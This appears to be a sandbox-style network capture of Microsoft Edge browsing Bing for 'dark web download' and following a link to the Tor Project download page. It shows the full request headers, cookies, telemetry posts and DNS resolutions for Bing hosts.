POST /fd/ls/GLinkPingPost.aspx?IG=46DB1346077049719FA2E2E87EA23DEA&ID=SERP,5209.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Df909e1ccc54b0942b84ec479fee5f32a68903be8d0c21f85be75eff5660d3b67JmltdHM9MTczMzI3MDQwMA%26ptn%3D3%26ver%3D2%26hsh%3D4%26fclid%3D288eea91-22c9-6a18-3944-ffda23616b9b%26psq%3Ddark%2Bweb%2Bdownload%26u%3Da1aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQv%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306986.7f2c572
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 285
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306986.7f2c571
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 19264
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917
GET

https://www.bing.com/ck/a?!&&p=f909e1ccc54b0942b84ec479fee5f32a68903be8d0c21f85be75eff5660d3b67JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=288eea91-22c9-6a18-3944-ffda23616b9b&psq=dark+web+download&u=a1aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQv&ntb=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /ck/a?!&&p=f909e1ccc54b0942b84ec479fee5f32a68903be8d0c21f85be75eff5660d3b67JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=288eea91-22c9-6a18-3944-ffda23616b9b&psq=dark+web+download&u=a1aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQv&ntb=1 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917
GET

https://www.bing.com/favicon.ico

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /favicon.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917
cookie: MSPTC=MWmgv5v2SZ-gSyyeKrWV4OZEiZXUbjIMY3tKl7qiB_4
POST

https://www.bing.com/fd/ls/ls.gif?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306977106}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306977106}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917
cookie: MSPTC=MWmgv5v2SZ-gSyyeKrWV4OZEiZXUbjIMY3tKl7qiB_4
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 601
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917
cookie: MSPTC=MWmgv5v2SZ-gSyyeKrWV4OZEiZXUbjIMY3tKl7qiB_4
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.3

e86303.dscx.akamaiedge.net

IN A

88.221.135.17

e86303.dscx.akamaiedge.net

IN A

88.221.135.16

e86303.dscx.akamaiedge.net

IN A

88.221.135.18

e86303.dscx.akamaiedge.net

IN A

88.221.135.1

e86303.dscx.akamaiedge.net

IN A

88.221.135.0

e86303.dscx.akamaiedge.net

IN A

88.221.135.19

e86303.dscx.akamaiedge.net

IN A

88.221.135.2

e86303.dscx.akamaiedge.net

IN A

88.221.135.24
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.50

e86303.dscx.akamaiedge.net

IN A

88.221.135.32

e86303.dscx.akamaiedge.net

IN A

88.221.135.43

e86303.dscx.akamaiedge.net

IN A

88.221.135.48

